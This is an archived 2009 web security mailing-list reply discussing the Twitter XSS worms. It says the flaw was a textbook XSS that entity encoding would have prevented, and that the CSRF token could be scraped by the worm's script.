[WEB SECURITY] Twitter XSS worms
Chris Eng
ceng at Veracode.com
Mon Apr 13 16:54:56 EDT 2009
>From glancing at the .js code, the XSS looks like a textbook case, the
type that would be mitigated by the "best practice" solution, HTML
entity encoding. The attack string doesn't appear to use any unusual
transformations to evade filters.
Twitter uses a nonce called authenticity_token to protect against CSRF,
but that's irrelevant since the .js can just scrape the token off the
page.
> -----Original Message-----
> From: Steven M. Christey [mailto:coley at linus.mitre.org]
> Sent: Monday, April 13, 2009 3:59 PM
> To: Hoffman, Billy; Chris Eng
> Cc: robert at webappsec.org; websecurity at webappsec.org
> Subject: RE: [WEB SECURITY] Twitter XSS worms
>
>
> For those who speak fluent XSS, how obscure was the attack vector and
the
> attack technique? Actually, what I'm really wondering is, would "best
> practices" or even "average practices" have prevented this attack from
> succeeding? either for the XSS or the CSRF angles. Is
> Ajax-as-an-XSS-attack-vector still novel?
>
> - Steve
----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec
Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/
Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA
More information about the websecurity
mailing list